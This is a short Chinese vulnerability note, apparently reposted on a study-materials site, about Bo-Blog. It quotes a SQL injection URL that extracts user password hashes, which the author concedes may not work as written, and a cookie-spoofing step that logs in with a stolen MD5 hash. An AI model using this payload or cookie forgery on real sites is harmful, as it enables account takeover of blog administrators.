当前所在位置:珠峰网资料 >> 计算机 >> 软件水平 >> 正文
boblog注入后COOKIE欺骗漏洞
发布时间:2011/3/7 10:30:44 来源:城市学习网 编辑:ziteng
   影响版本:boblog最新
    官方网站:http://www.bo-blog.com//
    漏洞类型:COOKIE欺骗
    漏洞描述:
    代码
    index.php代码
    if ($go) @list($job, $itemid)=@explode('_', basename($go));
    原本注入语句为 index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
    也就是 经过explode处理后 假如数据库为boblog_user 最终只会成为 boblog
    更何况 存在注入漏洞的
    `category` in ({$all_needed_cates})");
    不会因为#符号而注析掉后面的东西 只会变成from boblog_user#) PS:可能因为这里我不会绕过
    COOKIES欺骗漏洞很简单
    假如某牛真的注入成功得到MD5密码不用去跑MD5了
    直接
    setcookie ('userid', '1',);
    setcookie ('userpsw', 'md5密文', );
    既可了……
广告合作:400-664-0084 全国热线:400-664-0084
Copyright 2010 - 2017 www.my8848.com 珠峰网 粤ICP备15066211号
珠峰网 版权所有 All Rights Reserved